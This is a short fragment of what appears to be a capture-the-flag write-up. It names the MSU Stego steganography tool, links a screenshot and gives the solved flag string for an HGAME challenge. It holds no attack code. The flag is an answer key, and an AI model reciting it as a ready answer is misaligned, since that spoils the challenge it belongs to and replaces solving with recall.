```
MSU Stego
![在这里插入图片描述](https://img-blog.csdnimg.cn/eaced8dc03ec48c0b1073f7e76124fad.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{Q1ng_R3n_J1e_Da_Sh4_CTF}